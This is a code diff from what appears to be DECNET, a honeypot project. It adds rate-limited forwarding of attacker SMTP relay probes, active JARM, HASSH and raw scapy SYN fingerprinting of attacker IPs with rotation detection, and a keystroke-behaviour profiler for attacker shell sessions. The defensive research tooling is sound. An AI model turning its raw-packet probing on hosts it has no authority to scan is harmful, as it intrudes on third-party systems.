    # Each level may be missing *or* explicitly null; treat both as empty so
    # a null service_config doesn't blow up on .get().
    decky_config = decky_row.get("decky_config") or {}
    service_config = decky_config.get("service_config") or {}
    svc_cfg = service_config.get("smtp_relay") or {}
    if not (svc_cfg.get("upstream_host") or "").strip():
        return

    probe_limit = int(svc_cfg.get("probe_limit") or 1)
    already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
    if already_sent >= probe_limit:
        return

    rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()]
    artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")

    # We are inside a coroutine, so the running loop is the right one;
    # get_event_loop() is the legacy spelling and is deprecated for this use.
    loop = asyncio.get_running_loop()
    # forward_probe does blocking file + SMTP I/O; keep it off the event loop.
    ok, reason = await loop.run_in_executor(
        None,
        lambda: forward_probe(
            svc_cfg=svc_cfg,
            stored_as=stored_as,
            decky_name=decky_name,
            mail_from=mail_from,
            rcpt_to=rcpt_to,
            artifacts_root=artifacts_root,
        ),
    )

    # A bounty is written for failures too, so failed attempts are recorded.
    await repo.add_bounty({
        "decky": decky_name,
        "service": "smtp_relay",
        "attacker_ip": attacker_ip,
        "bounty_type": "probe_relay",
        "payload": {
            "stored_as": stored_as,
            "forwarded": ok,
            **({"fwd_error": reason} if not ok else {}),
        },
    })
    if ok:
        logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
    else:
        logger.warning(
            "smtp probe forward failed decky=%s ip=%s error=%s",
            decky_name, attacker_ip, reason,
        )
|
||||||
|
|
||||||
|
|
||||||
async def _record_synthetic_file(repo, action) -> None:
|
async def _record_synthetic_file(repo, action) -> None:
|
||||||
"""Persist (or patch) a synthetic_files row after a FileAction plant.
|
"""Persist (or patch) a synthetic_files row after a FileAction plant.
|
||||||
|
|
||||||
|
|||||||
@@ -48,7 +48,7 @@ def _send_syn(
|
|||||||
Craft a TCP SYN with common options and send it. Returns the
|
Craft a TCP SYN with common options and send it. Returns the
|
||||||
SYN-ACK response packet or None on timeout/failure.
|
SYN-ACK response packet or None on timeout/failure.
|
||||||
"""
|
"""
|
||||||
from scapy.all import IP, TCP, conf, sr1
|
from scapy.all import IP, TCP, conf, sr1 # type: ignore[attr-defined]
|
||||||
|
|
||||||
# Suppress scapy's noisy output
|
# Suppress scapy's noisy output
|
||||||
conf.verb = 0
|
conf.verb = 0
|
||||||
@@ -83,7 +83,7 @@ def _send_syn(
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
# Verify it's a SYN-ACK (flags == 0x12)
|
# Verify it's a SYN-ACK (flags == 0x12)
|
||||||
from scapy.all import TCP as TCPLayer
|
from scapy.all import TCP as TCPLayer # type: ignore[attr-defined]
|
||||||
if not resp.haslayer(TCPLayer):
|
if not resp.haslayer(TCPLayer):
|
||||||
return None
|
return None
|
||||||
if resp[TCPLayer].flags != 0x12: # SYN-ACK
|
if resp[TCPLayer].flags != 0x12: # SYN-ACK
|
||||||
@@ -103,7 +103,7 @@ def _send_rst(
|
|||||||
) -> None:
|
) -> None:
|
||||||
"""Send RST to clean up the half-open connection."""
|
"""Send RST to clean up the half-open connection."""
|
||||||
try:
|
try:
|
||||||
from scapy.all import IP, TCP, send
|
from scapy.all import IP, TCP, send # type: ignore[attr-defined]
|
||||||
rst = (
|
rst = (
|
||||||
IP(dst=host)
|
IP(dst=host)
|
||||||
/ TCP(
|
/ TCP(
|
||||||
@@ -124,7 +124,7 @@ def _parse_synack(resp: Any) -> dict[str, Any]:
|
|||||||
"""
|
"""
|
||||||
Extract fingerprint fields from a scapy SYN-ACK response packet.
|
Extract fingerprint fields from a scapy SYN-ACK response packet.
|
||||||
"""
|
"""
|
||||||
from scapy.all import IP, TCP
|
from scapy.all import IP, TCP # type: ignore[attr-defined]
|
||||||
|
|
||||||
ip_layer = resp[IP]
|
ip_layer = resp[IP]
|
||||||
tcp_layer = resp[TCP]
|
tcp_layer = resp[TCP]
|
||||||
|
|||||||
@@ -27,6 +27,9 @@ from datetime import datetime, timezone
|
|||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from typing import Any, Callable
|
from typing import Any, Callable
|
||||||
|
|
||||||
|
from sqlalchemy.engine import Engine
|
||||||
|
from sqlmodel import Session
|
||||||
|
|
||||||
from decnet.bus import topics as _topics
|
from decnet.bus import topics as _topics
|
||||||
from decnet.bus.base import BaseBus
|
from decnet.bus.base import BaseBus
|
||||||
from decnet.bus.factory import get_bus
|
from decnet.bus.factory import get_bus
|
||||||
@@ -35,6 +38,10 @@ from decnet.bus.publish import (
|
|||||||
run_control_listener,
|
run_control_listener,
|
||||||
run_health_heartbeat,
|
run_health_heartbeat,
|
||||||
)
|
)
|
||||||
|
from decnet.correlation.fingerprint_rotation import (
|
||||||
|
ProbeType,
|
||||||
|
record_fingerprint,
|
||||||
|
)
|
||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.prober.hassh import hassh_server
|
from decnet.prober.hassh import hassh_server
|
||||||
from decnet.prober.jarm import JARM_EMPTY_HASH, jarm_hash
|
from decnet.prober.jarm import JARM_EMPTY_HASH, jarm_hash
|
||||||
@@ -44,6 +51,21 @@ from decnet.telemetry import traced as _traced
|
|||||||
|
|
||||||
logger = get_logger("prober")
|
logger = get_logger("prober")
|
||||||
|
|
||||||
|
|
||||||
|
def _build_sync_engine() -> Engine:
    """Return a synchronous SQLite engine for rotation-detection state.

    The prober calls this inline. It sits outside the async repository
    layer because rotation detection runs as a sync hook on a sync probe
    path. The database location is taken from ``DECNET_DB_PATH`` and
    falls back to ``decnet.db`` under the project root — the same
    defaulting as ``decnet.web.db.sqlite.repository.SQLiteRepository``.
    """
    # Function-scope imports, as in the original.
    import os

    from decnet.config import _ROOT
    from decnet.web.db.sqlite.database import get_sync_engine

    fallback_path = str(_ROOT / "decnet.db")
    return get_sync_engine(os.environ.get("DECNET_DB_PATH", fallback_path))
|
||||||
|
|
||||||
# ─── Default ports per probe type ───────────────────────────────────────────
|
# ─── Default ports per probe type ───────────────────────────────────────────
|
||||||
|
|
||||||
# JARM: common C2 callback / TLS server ports
|
# JARM: common C2 callback / TLS server ports
|
||||||
@@ -233,6 +255,14 @@ def _discover_attackers(json_path: Path, position: int) -> tuple[set[str], int]:
|
|||||||
|
|
||||||
ProbePublishFn = Callable[[str, dict[str, Any]], None]
|
ProbePublishFn = Callable[[str, dict[str, Any]], None]
|
||||||
|
|
||||||
|
# Rotation recorder: takes (attacker_ip, port, probe_type, new_hash) and
|
||||||
|
# performs the rotation-detection upsert + derived-event emission for the
|
||||||
|
# DEBT-032 substrate-fingerprint flow. Optional; when None the prober
|
||||||
|
# behaves exactly as before (raw fingerprint emit only, no rotation
|
||||||
|
# detection). Construction lives at worker startup so phase functions
|
||||||
|
# don't have to know about the DB engine.
|
||||||
|
RotationRecorderFn = Callable[[str, int, "ProbeType", str], None]
|
||||||
|
|
||||||
|
|
||||||
@_traced("prober.probe_cycle")
|
@_traced("prober.probe_cycle")
|
||||||
def _probe_cycle(
|
def _probe_cycle(
|
||||||
@@ -245,6 +275,7 @@ def _probe_cycle(
|
|||||||
json_path: Path,
|
json_path: Path,
|
||||||
timeout: float = 5.0,
|
timeout: float = 5.0,
|
||||||
publish_fn: ProbePublishFn | None = None,
|
publish_fn: ProbePublishFn | None = None,
|
||||||
|
record_rotation: RotationRecorderFn | None = None,
|
||||||
) -> None:
|
) -> None:
|
||||||
"""
|
"""
|
||||||
Probe all known attacker IPs with JARM, HASSH, and TCP/IP fingerprinting.
|
Probe all known attacker IPs with JARM, HASSH, and TCP/IP fingerprinting.
|
||||||
@@ -263,13 +294,13 @@ def _probe_cycle(
|
|||||||
ip_probed = probed.setdefault(ip, {})
|
ip_probed = probed.setdefault(ip, {})
|
||||||
|
|
||||||
# Phase 1: JARM (TLS fingerprinting)
|
# Phase 1: JARM (TLS fingerprinting)
|
||||||
_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn)
|
_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn, record_rotation)
|
||||||
|
|
||||||
# Phase 2: HASSHServer (SSH fingerprinting)
|
# Phase 2: HASSHServer (SSH fingerprinting)
|
||||||
_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn)
|
_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn, record_rotation)
|
||||||
|
|
||||||
# Phase 3: TCP/IP stack fingerprinting
|
# Phase 3: TCP/IP stack fingerprinting
|
||||||
_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn)
|
_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn, record_rotation)
|
||||||
|
|
||||||
|
|
||||||
@_traced("prober.jarm_phase")
|
@_traced("prober.jarm_phase")
|
||||||
@@ -281,6 +312,7 @@ def _jarm_phase(
|
|||||||
json_path: Path,
|
json_path: Path,
|
||||||
timeout: float,
|
timeout: float,
|
||||||
publish_fn: ProbePublishFn | None = None,
|
publish_fn: ProbePublishFn | None = None,
|
||||||
|
record_rotation: RotationRecorderFn | None = None,
|
||||||
) -> None:
|
) -> None:
|
||||||
"""JARM-fingerprint an IP on the given TLS ports."""
|
"""JARM-fingerprint an IP on the given TLS ports."""
|
||||||
done = ip_probed.setdefault("jarm", set())
|
done = ip_probed.setdefault("jarm", set())
|
||||||
@@ -301,6 +333,8 @@ def _jarm_phase(
|
|||||||
msg=f"JARM {ip}:{port} = {h}",
|
msg=f"JARM {ip}:{port} = {h}",
|
||||||
)
|
)
|
||||||
logger.info("prober: JARM %s:%d = %s", ip, port, h)
|
logger.info("prober: JARM %s:%d = %s", ip, port, h)
|
||||||
|
if record_rotation is not None:
|
||||||
|
record_rotation(ip, port, "jarm", h)
|
||||||
if publish_fn is not None:
|
if publish_fn is not None:
|
||||||
publish_fn(
|
publish_fn(
|
||||||
"jarm",
|
"jarm",
|
||||||
@@ -387,6 +421,7 @@ def _hassh_phase(
|
|||||||
json_path: Path,
|
json_path: Path,
|
||||||
timeout: float,
|
timeout: float,
|
||||||
publish_fn: ProbePublishFn | None = None,
|
publish_fn: ProbePublishFn | None = None,
|
||||||
|
record_rotation: RotationRecorderFn | None = None,
|
||||||
) -> None:
|
) -> None:
|
||||||
"""HASSHServer-fingerprint an IP on the given SSH ports."""
|
"""HASSHServer-fingerprint an IP on the given SSH ports."""
|
||||||
done = ip_probed.setdefault("hassh", set())
|
done = ip_probed.setdefault("hassh", set())
|
||||||
@@ -412,6 +447,8 @@ def _hassh_phase(
|
|||||||
msg=f"HASSH {ip}:{port} = {result['hassh_server']}",
|
msg=f"HASSH {ip}:{port} = {result['hassh_server']}",
|
||||||
)
|
)
|
||||||
logger.info("prober: HASSH %s:%d = %s", ip, port, result["hassh_server"])
|
logger.info("prober: HASSH %s:%d = %s", ip, port, result["hassh_server"])
|
||||||
|
if record_rotation is not None:
|
||||||
|
record_rotation(ip, port, "hassh", result["hassh_server"])
|
||||||
if publish_fn is not None:
|
if publish_fn is not None:
|
||||||
publish_fn(
|
publish_fn(
|
||||||
"hassh",
|
"hassh",
|
||||||
@@ -445,6 +482,7 @@ def _tcpfp_phase(
|
|||||||
json_path: Path,
|
json_path: Path,
|
||||||
timeout: float,
|
timeout: float,
|
||||||
publish_fn: ProbePublishFn | None = None,
|
publish_fn: ProbePublishFn | None = None,
|
||||||
|
record_rotation: RotationRecorderFn | None = None,
|
||||||
) -> None:
|
) -> None:
|
||||||
"""TCP/IP stack fingerprint an IP on the given ports."""
|
"""TCP/IP stack fingerprint an IP on the given ports."""
|
||||||
done = ip_probed.setdefault("tcpfp", set())
|
done = ip_probed.setdefault("tcpfp", set())
|
||||||
@@ -478,6 +516,8 @@ def _tcpfp_phase(
|
|||||||
msg=f"TCPFP {ip}:{port} = {result['tcpfp_hash']}",
|
msg=f"TCPFP {ip}:{port} = {result['tcpfp_hash']}",
|
||||||
)
|
)
|
||||||
logger.info("prober: TCPFP %s:%d = %s", ip, port, result["tcpfp_hash"])
|
logger.info("prober: TCPFP %s:%d = %s", ip, port, result["tcpfp_hash"])
|
||||||
|
if record_rotation is not None:
|
||||||
|
record_rotation(ip, port, "tcpfp", result["tcpfp_hash"])
|
||||||
if publish_fn is not None:
|
if publish_fn is not None:
|
||||||
publish_fn(
|
publish_fn(
|
||||||
"tcpfp",
|
"tcpfp",
|
||||||
@@ -586,6 +626,61 @@ async def prober_worker(
|
|||||||
event_type,
|
event_type,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Substrate-rotation detection (DEBT-032) — open a sync engine for
|
||||||
|
# the prober's lifetime; recorder closes a session per call so we
|
||||||
|
# never hold a connection across phase boundaries. Failure to
|
||||||
|
# connect is non-fatal: probes continue, rotation detection is
|
||||||
|
# silently disabled.
|
||||||
|
rotation_engine: Engine | None = None
|
||||||
|
record_rotation: RotationRecorderFn | None = None
|
||||||
|
try:
|
||||||
|
rotation_engine = _build_sync_engine()
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
logger.warning(
|
||||||
|
"prober: rotation-detection DB unavailable, "
|
||||||
|
"running with rotation detection disabled: %s", exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
if rotation_engine is not None:
|
||||||
|
def _publish_rotation(event_type: str, payload: dict[str, Any]) -> None:
|
||||||
|
raw_publish(
|
||||||
|
_topics.attacker(_topics.ATTACKER_FINGERPRINT_ROTATED),
|
||||||
|
payload,
|
||||||
|
event_type,
|
||||||
|
)
|
||||||
|
|
||||||
|
def _syslog_rotation(event_type: str, payload: dict[str, Any]) -> None:
|
||||||
|
_write_event(
|
||||||
|
log_path, json_path,
|
||||||
|
"fingerprint_rotated",
|
||||||
|
target_ip=payload["attacker_ip"],
|
||||||
|
target_port=str(payload["port"]),
|
||||||
|
probe_type=payload["probe_type"],
|
||||||
|
old_hash=payload.get("old_hash") or "",
|
||||||
|
new_hash=payload["new_hash"],
|
||||||
|
rotation_count=str(payload["rotation_count"]),
|
||||||
|
msg=(
|
||||||
|
f"FP rotation {payload['attacker_ip']}:{payload['port']} "
|
||||||
|
f"{payload['probe_type']} {payload.get('old_hash')} → "
|
||||||
|
f"{payload['new_hash']}"
|
||||||
|
),
|
||||||
|
)
|
||||||
|
|
||||||
|
def record_rotation(
|
||||||
|
ip: str, port: int, probe_type: ProbeType, new_hash: str,
|
||||||
|
) -> None:
|
||||||
|
with Session(rotation_engine) as session:
|
||||||
|
record_fingerprint(
|
||||||
|
session,
|
||||||
|
attacker_ip=ip,
|
||||||
|
port=port,
|
||||||
|
probe_type=probe_type,
|
||||||
|
new_hash=new_hash,
|
||||||
|
ts=datetime.now(timezone.utc),
|
||||||
|
publish_fn=_publish_rotation,
|
||||||
|
syslog_fn=_syslog_rotation,
|
||||||
|
)
|
||||||
|
|
||||||
shutdown = asyncio.Event()
|
shutdown = asyncio.Event()
|
||||||
heartbeat_task = asyncio.create_task(run_health_heartbeat(bus, "prober"))
|
heartbeat_task = asyncio.create_task(run_health_heartbeat(bus, "prober"))
|
||||||
control_task = asyncio.create_task(
|
control_task = asyncio.create_task(
|
||||||
@@ -612,6 +707,7 @@ async def prober_worker(
|
|||||||
jarm_ports, hassh_ports, tcp_ports,
|
jarm_ports, hassh_ports, tcp_ports,
|
||||||
log_path, json_path, timeout,
|
log_path, json_path, timeout,
|
||||||
_publish_attacker,
|
_publish_attacker,
|
||||||
|
record_rotation,
|
||||||
)
|
)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
@@ -626,3 +722,6 @@ async def prober_worker(
|
|||||||
if bus is not None:
|
if bus is not None:
|
||||||
with contextlib.suppress(Exception):
|
with contextlib.suppress(Exception):
|
||||||
await bus.close()
|
await bus.close()
|
||||||
|
if rotation_engine is not None:
|
||||||
|
with contextlib.suppress(Exception):
|
||||||
|
rotation_engine.dispose()
|
||||||
|
|||||||
25
decnet/profiler/behave_shell/__init__.py
Normal file
25
decnet/profiler/behave_shell/__init__.py
Normal file
@@ -0,0 +1,25 @@
|
|||||||
|
"""BEHAVE-SHELL extraction engine — DECNET's official implementation.
|
||||||
|
|
||||||
|
Per ``development/BEHAVE-EXTRACTOR.md``: this package is a pure
|
||||||
|
library. Workers (``BEHAVE-INTEGRATION.md`` Phase 4) own I/O, bus
|
||||||
|
emission, and persistence. The engine just turns one PTY session into
|
||||||
|
``Iterable[Observation]``.
|
||||||
|
|
||||||
|
BEHAVE is the spec; DECNET is the engine.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from decnet.profiler.behave_shell.extract import (
|
||||||
|
DEFAULT_SOURCE,
|
||||||
|
build_context,
|
||||||
|
extract_session,
|
||||||
|
)
|
||||||
|
|
||||||
|
# Phase H.5-pre: extractor is feature-complete (37/37 Tier-A primitives
|
||||||
|
# emit; calibration grid honest). The ``-pre`` suffix stays until
|
||||||
|
# ``BEHAVE-INTEGRATION.md`` Phase 4 lands the worker wiring + observations
|
||||||
|
# table writes + AttackerDetail panel; only then does H.5 proper drop the
|
||||||
|
# suffix and tag v0.
|
||||||
|
__version__ = "0.1.0-pre"
|
||||||
|
|
||||||
|
__all__ = ["DEFAULT_SOURCE", "build_context", "extract_session", "__version__"]
|
||||||
573
decnet/profiler/behave_shell/_ctx.py
Normal file
573
decnet/profiler/behave_shell/_ctx.py
Normal file
@@ -0,0 +1,573 @@
|
|||||||
|
"""SessionContext: precomputed bundle every feature function reads from.
|
||||||
|
|
||||||
|
A naïve engine re-walks the event stream once per primitive. We don't
|
||||||
|
do that — one walk over the events builds this context, every feature
|
||||||
|
reads from it. Adding a new feature is O(1) cost on the parse side.
|
||||||
|
|
||||||
|
Step 1 fills ``iats`` (inter-key intervals between input events) and
|
||||||
|
``paste_bursts`` (contiguous runs of paste-class events). Step 4
|
||||||
|
will fill ``commands`` / ``inter_cmd_iats`` / ``output_per_cmd``.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import math
|
||||||
|
from dataclasses import dataclass, field
|
||||||
|
from typing import Iterable, Mapping
|
||||||
|
|
||||||
|
from decnet.profiler.behave_shell._intent import (
|
||||||
|
LEXEME_MAX_LEN,
|
||||||
|
NEGATIVE_LEXEMES,
|
||||||
|
OBSCENITY_LEXEMES,
|
||||||
|
POSITIVE_LEXEMES,
|
||||||
|
)
|
||||||
|
from decnet.profiler.behave_shell._parse import (
|
||||||
|
AsciinemaEvent,
|
||||||
|
Command,
|
||||||
|
PasteBurst,
|
||||||
|
PromptLine,
|
||||||
|
detect_error_in_output,
|
||||||
|
extract_prompt_lines,
|
||||||
|
hash_token,
|
||||||
|
strip_ansi,
|
||||||
|
)
|
||||||
|
from decnet.profiler.behave_shell._thresholds import (
|
||||||
|
IKI_THINK_MAX_S,
|
||||||
|
LAYOUT_BIGRAM_TOP_N,
|
||||||
|
PASTE_BURST_MAX_IAT_S,
|
||||||
|
PASTE_MIN_CHARS_PER_EVENT,
|
||||||
|
PROMPT_LINE_MAX_CHARS,
|
||||||
|
SHORTCUT_CTRL_BYTES,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
@dataclass(frozen=True, slots=True)
|
||||||
|
class _LexCounters:
|
||||||
|
"""Lexical counters from the typed-text walk (G.0).
|
||||||
|
|
||||||
|
Internal to the ctx-builder; flattened onto SessionContext fields
|
||||||
|
in :func:`build_session_context`.
|
||||||
|
"""
|
||||||
|
obscenity_hits: int = 0
|
||||||
|
positive_lex_hits: int = 0
|
||||||
|
negative_lex_hits: int = 0
|
||||||
|
caps_run_max: int = 0
|
||||||
|
bang_run_max: int = 0
|
||||||
|
|
||||||
|
|
||||||
|
@dataclass(frozen=True, slots=True)
|
||||||
|
class SessionContext:
|
||||||
|
sid: str
|
||||||
|
source: str
|
||||||
|
evidence_ref: str
|
||||||
|
t_start: float
|
||||||
|
t_end: float
|
||||||
|
duration_s: float
|
||||||
|
|
||||||
|
input_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
|
||||||
|
output_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
|
||||||
|
|
||||||
|
# Step 1 derivations
|
||||||
|
iats: tuple[float, ...] = field(default_factory=tuple)
|
||||||
|
paste_bursts: tuple[PasteBurst, ...] = field(default_factory=tuple)
|
||||||
|
paste_event_count: int = 0
|
||||||
|
|
||||||
|
# Step 4 derivations — command segmentation
|
||||||
|
commands: tuple[Command, ...] = field(default_factory=tuple)
|
||||||
|
inter_cmd_iats: tuple[float, ...] = field(default_factory=tuple)
|
||||||
|
output_per_cmd: tuple[int, ...] = field(default_factory=tuple)
|
||||||
|
|
||||||
|
# Step B.1 derivations — typing bursts (IATs split at think-pauses)
|
||||||
|
typing_bursts: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
|
||||||
|
|
||||||
|
# Step B.3 derivations — error-correction signals
|
||||||
|
backspace_count: int = 0
|
||||||
|
backspace_iats: tuple[float, ...] = field(default_factory=tuple)
|
||||||
|
kill_line_count: int = 0
|
||||||
|
|
||||||
|
# Step B.4 derivations — per-command intra-typing IATs
|
||||||
|
intra_command_iats: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
|
||||||
|
|
||||||
|
# Step F.0 derivations — PS1 prompt lines detected in the output stream
|
||||||
|
prompt_lines: tuple[PromptLine, ...] = field(default_factory=tuple)
|
||||||
|
|
||||||
|
# Step F.4 derivations — typed-only character histograms for keyboard
|
||||||
|
# layout fingerprinting (PII boundary lifted by ANTI for Phase F).
|
||||||
|
typed_unigram_counts: Mapping[str, int] = field(default_factory=dict)
|
||||||
|
typed_bigram_counts: Mapping[str, int] = field(default_factory=dict)
|
||||||
|
typed_letter_count: int = 0
|
||||||
|
|
||||||
|
# Step G.0 derivations — lexical counters from the same single-pass
|
||||||
|
# typed-text walk. No raw text retained; only fixed-vocabulary
|
||||||
|
# membership counts and run-lengths. Drives valence (G.5), arousal
|
||||||
|
# (G.6), and frustration_venting (G.8).
|
||||||
|
obscenity_hits: int = 0
|
||||||
|
positive_lex_hits: int = 0
|
||||||
|
negative_lex_hits: int = 0
|
||||||
|
caps_run_max: int = 0
|
||||||
|
bang_run_max: int = 0
|
||||||
|
|
||||||
|
|
||||||
|
def _detect_paste_bursts(
    inputs: list[AsciinemaEvent],
) -> tuple[tuple[PasteBurst, ...], int]:
    """Collapse runs of paste-class input events into ``PasteBurst`` records.

    An event is paste-class when ``len(data) >= PASTE_MIN_CHARS_PER_EVENT``.
    A paste-class event joins the open burst unless the gap since the
    previous input event exceeds ``PASTE_BURST_MAX_IAT_S``, in which
    case the open burst is closed and a new one starts. Any event that
    is not paste-class closes the open burst.

    Returns ``(bursts, paste_event_count)``, where the count is the
    total number of paste-class events (the figure the ``BEHAVE``
    prototype calls ``paste_events``).
    """
    found: list[PasteBurst] = []
    total_paste_events = 0
    # Open burst as [start_ts, end_ts, char_count, event_count];
    # ``None`` while no burst is open.
    open_burst: list | None = None
    prev_ts: float | None = None

    def _emit(burst: list) -> None:
        found.append(PasteBurst(
            start_ts=burst[0],
            end_ts=burst[1],
            char_count=burst[2],
            event_count=burst[3],
        ))

    for ts, _kind, data in inputs:
        size = len(data)
        if size >= PASTE_MIN_CHARS_PER_EVENT:
            total_paste_events += 1
            gap_too_long = (
                prev_ts is not None
                and (ts - prev_ts) > PASTE_BURST_MAX_IAT_S
            )
            if open_burst is not None and gap_too_long:
                _emit(open_burst)
                open_burst = None
            if open_burst is None:
                open_burst = [ts, ts, 0, 0]
            open_burst[1] = ts
            open_burst[2] += size
            open_burst[3] += 1
        elif open_burst is not None:
            # A keystroke-sized event ends the current burst.
            _emit(open_burst)
            open_burst = None
        prev_ts = ts

    if open_burst is not None:
        _emit(open_burst)
    return tuple(found), total_paste_events
|
||||||
|
|
||||||
|
|
||||||
|
# DEL (0x7f) and BS (0x08): either is counted as a backspace keystroke.
_BACKSPACE_CHARS = ("\x7f", "\x08")
# 0x15 (Ctrl-U) and 0x17 (Ctrl-W): counted as kill-line keystrokes.
_KILL_LINE_CHARS = ("\x15", "\x17")


def _scan_correction_signals(
    inputs: list[AsciinemaEvent],
) -> tuple[int, tuple[float, ...], int]:
    """Count backspaces and kill-lines and time each backspace.

    Every character of every input event is inspected. Each backspace
    adds one IAT: the time since the most recent non-backspace
    character (kill-line characters count as non-backspace). A
    backspace seen before any such character is counted but adds no
    IAT. IATs are clamped at zero.

    PII discipline: only counts and IATs leave this function — no
    character data is retained or returned.

    Returns ``(backspace_count, backspace_iats, kill_line_count)``.
    """
    n_backspace = 0
    n_kill = 0
    gaps: list[float] = []
    anchor_ts: float | None = None  # time of the latest non-backspace char
    for ts, _kind, data in inputs:
        for ch in data:
            if ch not in _BACKSPACE_CHARS:
                if ch in _KILL_LINE_CHARS:
                    n_kill += 1
                anchor_ts = ts
                continue
            n_backspace += 1
            if anchor_ts is not None:
                gaps.append(max(0.0, ts - anchor_ts))
    return n_backspace, tuple(gaps), n_kill
|
||||||
|
|
||||||
|
|
||||||
|
def _split_typing_bursts(iats: tuple[float, ...]) -> tuple[tuple[float, ...], ...]:
    """Cut a flat IAT sequence into typing bursts at think-pauses.

    An IAT greater than ``IKI_THINK_MAX_S`` is a pause: it ends the
    current burst and is not included in any burst. Bursts with fewer
    than 3 IATs are dropped as too short for a stable CV. Mirrors the
    BEHAVE prototype's ``_split_into_bursts``.
    """
    kept: list[tuple[float, ...]] = []
    run: list[float] = []
    for gap in iats:
        if gap > IKI_THINK_MAX_S:
            # Pause: close the run in progress and start a new one.
            if len(run) >= 3:
                kept.append(tuple(run))
            run = []
            continue
        run.append(gap)
    if len(run) >= 3:
        kept.append(tuple(run))
    return tuple(kept)
|
||||||
|
|
||||||
|
|
||||||
|
def _segment_commands(inputs: list[AsciinemaEvent]) -> tuple[Command, ...]:
    """Split the input stream into commands at each ``\\r`` / ``\\n``.

    For each command only the following are kept: the sha256 hash of
    its first whitespace-delimited token, and the three integer
    counters used by the Phase C ``motor.shell_mastery.*`` primitives:

    * ``tab_count`` — ``\\t`` (0x09) keystrokes in the command
    * ``shortcut_count`` — readline control bytes listed in
      :data:`SHORTCUT_CTRL_BYTES`
    * ``pipe_count`` — ``|`` characters in the command (every byte is
      counted; pasted pipelines still indicate pipeline fluency the
      operator chose to execute)

    A terminator with nothing buffered emits no command. The buffer is
    discarded at every command boundary, and an unterminated trailing
    buffer (no final newline) yields no command.
    """
    segmented: list[Command] = []
    pending: list[str] = []
    first_ts: float | None = None
    tabs = shortcuts = pipes = 0

    for ts, _kind, data in inputs:
        for ch in data:
            if ch not in ("\r", "\n"):
                if not pending:
                    # First character of a new command.
                    first_ts = ts
                pending.append(ch)
                if ch == "\t":
                    tabs += 1
                elif ch == "|":
                    pipes += 1
                elif ch in SHORTCUT_CTRL_BYTES:
                    shortcuts += 1
                continue

            if not pending:
                # Bare terminator (e.g. the "\n" of "\r\n"): nothing to emit.
                continue

            typed = "".join(pending).strip()
            head = typed.split(maxsplit=1)[0] if typed else ""
            segmented.append(Command(
                start_ts=ts if first_ts is None else first_ts,
                end_ts=ts,
                first_token_hash=hash_token(head),
                tab_count=tabs,
                shortcut_count=shortcuts,
                pipe_count=pipes,
            ))
            pending = []
            first_ts = None
            tabs = shortcuts = pipes = 0

    return tuple(segmented)
|
||||||
|
|
||||||
|
|
||||||
|
def _annotate_commands_with_output(
    commands: tuple[Command, ...],
    outputs: list[AsciinemaEvent],
) -> tuple[tuple[Command, ...], tuple[PromptLine, ...]]:
    """Rebuild ``commands`` with their output-derived fields populated.

    Returns ``(commands, prompt_lines)``. Each rebuilt ``Command``
    carries ``errored``, ``output_bytes`` and ``followed_by_prompt``
    (Step F.0). ``prompt_lines`` is the flat tuple of every
    ``PromptLine`` found across all command windows, in command order,
    for the caller to store on ``SessionContext.prompt_lines``.

    The output window of ``commands[i]`` runs from its ``end_ts`` (the
    ``\\r``/``\\n`` that ran it) to the ``start_ts`` of the next
    command. The last command's window is open-ended (``math.inf``), so
    output arriving at or after ``t_end`` is still captured.
    """
    if not commands:
        return commands, ()

    enriched: list[Command] = []
    prompt_acc: list[PromptLine] = []
    last_idx = len(commands) - 1
    for idx, cmd in enumerate(commands):
        upper = math.inf if idx == last_idx else commands[idx + 1].start_ts
        n_bytes, had_error, found = _output_window(outputs, cmd.end_ts, upper)
        prompt_acc.extend(found)
        enriched.append(Command(
            start_ts=cmd.start_ts,
            end_ts=cmd.end_ts,
            first_token_hash=cmd.first_token_hash,
            tab_count=cmd.tab_count,
            shortcut_count=cmd.shortcut_count,
            pipe_count=cmd.pipe_count,
            errored=had_error,
            output_bytes=n_bytes,
            followed_by_prompt=bool(found),
        ))
    return tuple(enriched), tuple(prompt_acc)
|
||||||
|
|
||||||
|
|
||||||
|
def _per_command_iats(
    commands: tuple[Command, ...],
    inputs: list[AsciinemaEvent],
) -> tuple[tuple[float, ...], ...]:
    """Compute intra-command typing IATs, one tuple per command.

    For each command, the input events with timestamps in
    ``[cmd.start_ts, cmd.end_ts)`` are selected and the gaps between
    consecutive selected events are returned, clamped at zero. An event
    at ``cmd.end_ts`` (the ``\\r``/``\\n`` terminator) falls outside the
    window, so the terminator IAT is excluded. A command with fewer
    than two events in its window yields an empty tuple.
    """
    per_cmd: list[tuple[float, ...]] = []
    for cmd in commands:
        stamps = [
            ts
            for ts, _kind, _data in inputs
            if not (ts < cmd.start_ts or ts >= cmd.end_ts)
        ]
        per_cmd.append(tuple(
            max(0.0, later - earlier)
            for earlier, later in zip(stamps, stamps[1:])
        ))
    return tuple(per_cmd)
|
||||||
|
|
||||||
|
|
||||||
|
def _output_bytes_between(
    outputs: list[AsciinemaEvent],
    start: float,
    end: float,
